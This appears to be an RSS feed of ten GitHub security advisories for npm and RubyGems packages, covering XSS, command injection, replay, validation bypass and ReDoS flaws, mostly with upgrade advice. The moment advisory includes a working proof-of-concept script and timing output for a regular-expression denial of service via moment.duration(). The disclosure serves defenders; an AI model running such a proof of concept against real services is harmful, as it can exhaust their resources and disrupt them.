<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent entries from github</title>
    <link>https://cve.radiocsirt.org</link>
    <description>Contains only the most 10 recent entries.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 02 Oct 2026 08:48:38 +0000</lastBuildDate>
    <item>
      <title>GHSA-2fqv-h3r5-m4vf — Cross Site Scripting (XSS) in plotly.js</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-2fqv-h3r5-m4vf</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: plotly.js&lt;/p&gt;
&lt;p&gt;Affected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to 1.16.0 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: plotly.js&lt;/p&gt;
&lt;p&gt;Affected versions of `plotly.js` are vulnerable to cross-site scripting if an attacker can convince a user to visit a malicious plot on a site using this package.&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to 1.16.0 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-2fqv-h3r5-m4vf</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-3m6r-39p3-jq25 — Doorkeeper is vulnerable to replay attacks</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-3m6r-39p3-jq25</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: doorkeeper&lt;/p&gt;
&lt;p&gt;The Doorkeeper gem before 4.2.0 for Ruby might allow remote attackers to conduct replay attacks or revoke arbitrary tokens by leveraging failure to implement the OAuth 2.0 Token Revocation specification.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: doorkeeper&lt;/p&gt;
&lt;p&gt;The Doorkeeper gem before 4.2.0 for Ruby might allow remote attackers to conduct replay attacks or revoke arbitrary tokens by leveraging failure to implement the OAuth 2.0 Token Revocation specification.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-3m6r-39p3-jq25</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-4jm3-pfpf-h54p — espeak-ruby allows arbitrary command execution</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-4jm3-pfpf-h54p</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: espeak-ruby&lt;/p&gt;
&lt;p&gt;The espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the `speak`, `save`, `bytes` or `bytes_wav` method in `lib/espeak/speech.rb`.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: espeak-ruby&lt;/p&gt;
&lt;p&gt;The espeak-ruby gem before 1.0.3 for Ruby allows remote attackers to execute arbitrary commands via shell metacharacters in a string to the `speak`, `save`, `bytes` or `bytes_wav` method in `lib/espeak/speech.rb`.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-4jm3-pfpf-h54p</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-543v-gj2c-r3ch — activemodel contains Improper Input Validation</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-543v-gj2c-r3ch</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: activemodel&lt;/p&gt;
&lt;p&gt;Active Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: activemodel&lt;/p&gt;
&lt;p&gt;Active Model in Ruby on Rails 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 supports the use of instance-level writers for class accessors, which allows remote attackers to bypass intended validation steps via crafted parameters.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-543v-gj2c-r3ch</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-5vx5-9q73-wgp4 — Safemode Gem Has Incomplete List of Disallowed Inputs</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-5vx5-9q73-wgp4</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: safemode&lt;/p&gt;
&lt;p&gt;rubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: safemode&lt;/p&gt;
&lt;p&gt;rubygem-safemode, as used in Foreman, versions 1.3.1 and earlier are vulnerable to bypassing safe mode limitations via special Ruby syntax. This can lead to deletion of objects for which the user does not have delete permissions or possibly to privilege escalation.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-5vx5-9q73-wgp4</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-6h88-qjpv-p32m — OpenSSL gem for Ruby using inadequate encryption strength</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-6h88-qjpv-p32m</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: openssl&lt;/p&gt;
&lt;p&gt;The OpenSSL gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: openssl&lt;/p&gt;
&lt;p&gt;The OpenSSL gem for Ruby uses the same initialization vector (IV) in GCM Mode (aes-*-gcm) when the IV is set before the key, which makes it easier for context-dependent attackers to bypass the encryption protection mechanism.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-6h88-qjpv-p32m</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-78rc-8c29-p45g — actionpack allows remote code execution via application's unrestricted use of render method</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-78rc-8c29-p45g</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: actionpack&lt;/p&gt;
&lt;p&gt;Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application&amp;#39;s unrestricted use of the render method.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: actionpack&lt;/p&gt;
&lt;p&gt;Action Pack in Ruby on Rails before 3.2.22.2, 4.x before 4.1.14.2, and 4.2.x before 4.2.5.2 allows remote attackers to execute arbitrary Ruby code by leveraging an application&amp;#39;s unrestricted use of the render method.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-78rc-8c29-p45g</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-87vv-r9j6-g5qv — Regular Expression Denial of Service in moment</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-87vv-r9j6-g5qv</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: moment&lt;/p&gt;
&lt;p&gt;Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`.&lt;/p&gt;
&lt;p&gt;## Proof of concept
```
var moment = require(&amp;#39;moment&amp;#39;);&lt;/p&gt;
&lt;p&gt;var genstr = function (len, chr) {
    var result = &amp;#34;&amp;#34;;
    for (i=0; i&amp;lt;=len; i++) {
        result = result + chr;
    }&lt;/p&gt;
&lt;p&gt;return result;
}&lt;/p&gt;
&lt;p&gt;for (i=20000;i&amp;lt;=10000000;i=i+10000) {
    console.log(&amp;#34;COUNT: &amp;#34; + i);
    var str = &amp;#39;-&amp;#39; + genstr(i, &amp;#39;1&amp;#39;)
    console.log(&amp;#34;LENGTH: &amp;#34; + str.length);
    var start = process.hrtime();
    moment.duration(str)&lt;/p&gt;
&lt;p&gt;var end = process.hrtime(start);
    console.log(end);
}
```&lt;/p&gt;
&lt;p&gt;### Results
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Please update to version 2.11.2 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: moment&lt;/p&gt;
&lt;p&gt;Versions of `moment` prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into `moment.duration()`.&lt;/p&gt;
&lt;p&gt;## Proof of concept
```
var moment = require(&amp;#39;moment&amp;#39;);&lt;/p&gt;
&lt;p&gt;var genstr = function (len, chr) {
    var result = &amp;#34;&amp;#34;;
    for (i=0; i&amp;lt;=len; i++) {
        result = result + chr;
    }&lt;/p&gt;
&lt;p&gt;return result;
}&lt;/p&gt;
&lt;p&gt;for (i=20000;i&amp;lt;=10000000;i=i+10000) {
    console.log(&amp;#34;COUNT: &amp;#34; + i);
    var str = &amp;#39;-&amp;#39; + genstr(i, &amp;#39;1&amp;#39;)
    console.log(&amp;#34;LENGTH: &amp;#34; + str.length);
    var start = process.hrtime();
    moment.duration(str)&lt;/p&gt;
&lt;p&gt;var end = process.hrtime(start);
    console.log(end);
}
```&lt;/p&gt;
&lt;p&gt;### Results
```
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
```&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Please update to version 2.11.2 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-87vv-r9j6-g5qv</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-c92m-rrrc-q5wf — safemode gem allows context-dependent attackers to obtain sensitive information via the inspect method</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-c92m-rrrc-q5wf</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: safemode&lt;/p&gt;
&lt;p&gt;The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; RubyGems: safemode&lt;/p&gt;
&lt;p&gt;The Safemode gem before 1.2.4 for Ruby, when initialized with a delegate object that is a Rails controller, allows context-dependent attackers to obtain sensitive information via the inspect method.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-c92m-rrrc-q5wf</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
    <item>
      <title>GHSA-f522-ffg8-j8r6 — Regular Expression Denial of Service in is-my-json-valid</title>
      <link>https://cve.radiocsirt.org/vuln/ghsa-f522-ffg8-j8r6</link>
      <description>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: is-my-json-valid&lt;/p&gt;
&lt;p&gt;Version of `is-my-json-valid` before 2.12.4 are vulnerable to regular expression denial of service (ReDoS) via the email validation function.&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.12.4 or later.&lt;/p&gt;</description>
      <content:encoded>&lt;p&gt;&lt;strong&gt;Affected:&lt;/strong&gt; npm: is-my-json-valid&lt;/p&gt;
&lt;p&gt;Version of `is-my-json-valid` before 2.12.4 are vulnerable to regular expression denial of service (ReDoS) via the email validation function.&lt;/p&gt;
&lt;p&gt;## Recommendation&lt;/p&gt;
&lt;p&gt;Update to version 2.12.4 or later.&lt;/p&gt;</content:encoded>
      <guid isPermaLink="false">https://cve.radiocsirt.org/vuln/ghsa-f522-ffg8-j8r6</guid>
      <pubDate>Tue, 24 Oct 2017 18:33:35 +0000</pubDate>
    </item>
  </channel>
</rss>
